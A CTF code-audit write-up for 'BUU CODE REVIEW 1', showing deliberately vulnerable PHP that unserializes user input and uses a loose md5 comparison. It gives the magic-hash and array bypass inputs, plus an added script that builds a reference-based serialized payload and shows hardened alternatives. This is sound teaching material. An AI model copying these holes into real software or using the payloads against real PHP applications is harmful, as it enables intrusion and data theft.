CTF Code Audit: BUU CODE REVIEW 1
阿新 • Published: 2020-09-08
BUU CODE REVIEW 1
Key points tested: deserialization, md5 bypass
Magic method __destruct(): runs when every reference to the object has been removed, or when the object is explicitly destroyed
Challenge:
```php
<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */
highlight_file(__FILE__);

class BUU {
    public $correct = "";
    public $input = "";

    public function __destruct() {
        try {
            $this->correct = base64_encode(uniqid());
            if ($this->correct === $this->input) {
                echo file_get_contents("/flag");
            }
        } catch (Exception $e) {
        }
    }
}

if ($_GET['pleaseget'] === '1') {
    if ($_POST['pleasepost'] === '2') {
        if (md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}
```
Solution:
1. Construct the serialized payload
The output contains the flag.
Note: here you can use md51=QNKCDZO&md52=240610708 (weak typing) or md51[]=1&md52[]=2 (arrays).
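To show why both checks in the challenge are unsound and how each would be hardened, here is an added PHP example (not code from the write-up or the challenge author); the class name Demo is assumed, and the script only prints comparison results.

```php
<?php
// Added example, not part of the original write-up: it reproduces why the
// challenge's two checks are unsound and shows a hardened form of each.
// The class name Demo is hypothetical; nothing here reads /flag.

// Check 1: loose md5 comparison. md5("QNKCDZO") and md5("240610708")
// both begin with "0e" followed only by digits, so == casts them to the
// float 0 and they compare equal although the inputs differ. An array
// argument makes md5() return NULL, and NULL == NULL is also true.
function weakMd5Check($a, $b): bool {
    return md5($a) == md5($b) && $a != $b;
}
// Hardened: require strings and compare digests with hash_equals().
function strictMd5Check($a, $b): bool {
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(md5($a), md5($b)) && $a !== $b;
}
var_dump(weakMd5Check("QNKCDZO", "240610708"));
var_dump(strictMd5Check("QNKCDZO", "240610708"));

// Check 2: the destructor regenerates $correct, so no fixed $input can
// equal it. It is still reachable because serialize() preserves PHP
// references: if $input is a reference to $correct, the two properties
// are one variable and the === test passes whatever value is assigned.
class Demo {
    public $correct = "";
    public $input = "";
    public function __destruct() {
        $this->correct = base64_encode(uniqid());
        echo ($this->correct === $this->input) ? "match\n" : "no match\n";
    }
}
$o = new Demo();
$o->input = &$o->correct;   // encoded as R:2; in the serialized form
$payload = serialize($o);
echo $payload, "\n";
unset($o);                  // destructor runs on the original object
unserialize($payload);      // and again on the restored object

// Hardened: never pass untrusted data to unserialize(). Accept a format
// without object semantics instead (JSON), or at least forbid classes.
$plain = json_decode('{"correct":"","input":""}', true);
$noObjects = unserialize($payload, ['allowed_classes' => false]);
var_dump(is_array($plain), $noObjects instanceof __PHP_Incomplete_Class);
```

With allowed_classes set to false the restored value is a __PHP_Incomplete_Class, so no destructor of the application's classes runs.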